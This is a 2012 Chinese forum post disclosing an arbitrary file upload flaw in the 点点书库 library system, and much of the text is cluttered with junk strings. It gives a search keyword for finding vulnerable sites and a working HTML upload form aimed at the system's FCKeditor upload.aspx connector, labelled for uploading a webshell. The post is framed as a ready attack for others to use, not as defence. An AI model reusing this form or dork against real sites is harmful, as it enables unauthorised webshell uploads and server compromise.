主题:图书馆系统任意文件上传漏洞( F+ F% ~9 b8 K
作者:冰锋刺客
9 _1 q+ N: f; U, s 厂商:点击书(dianjishu.com)
3 `; ?4 e- W3 R 日期:2012-6-21; {# k: B- O" f7 {
& u6 y( y7 N6 b' E4 S. A! k
I 概述( O/ F' \3 }4 [% |& h( Q& Q7 A
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell2 l# f$ t8 z. i' j! Y
II 简介& |) [: J# G5 z% t6 R3 f
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"$ N0 x5 _( }) Q1 s0 Z
补充一个漏洞6 G$ C1 h+ o. }# N5 s+ Z
<form id="frmUpload" enctype="multipart/form-data", k2 x, u: ^$ e/ |1 ?
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>$ M$ w3 W9 M( @ i1 I+ v7 ~" z
<input id="btnUpload" type="submit" value="操翻他">: Z0 i0 i/ ], h
</form>
) v/ [7 X; s+ R& }. |3 v. e" k0 K 你们懂的
+ d8 ?! d% ]9 }, G3 U6 t% v+ H3 j# \ 那傻逼提供还需要改包.3 V( K' }* b) R2 }- H+ d1 A
自己看了下源代码发现fckeditor1 P3 x- ]( O- m4 S& B9 H! c
直接秒杀7 O1 q* p; \) @# S! D/ \4 |
|
发表于 2012-9-10 21:20:59
收藏
支持
反对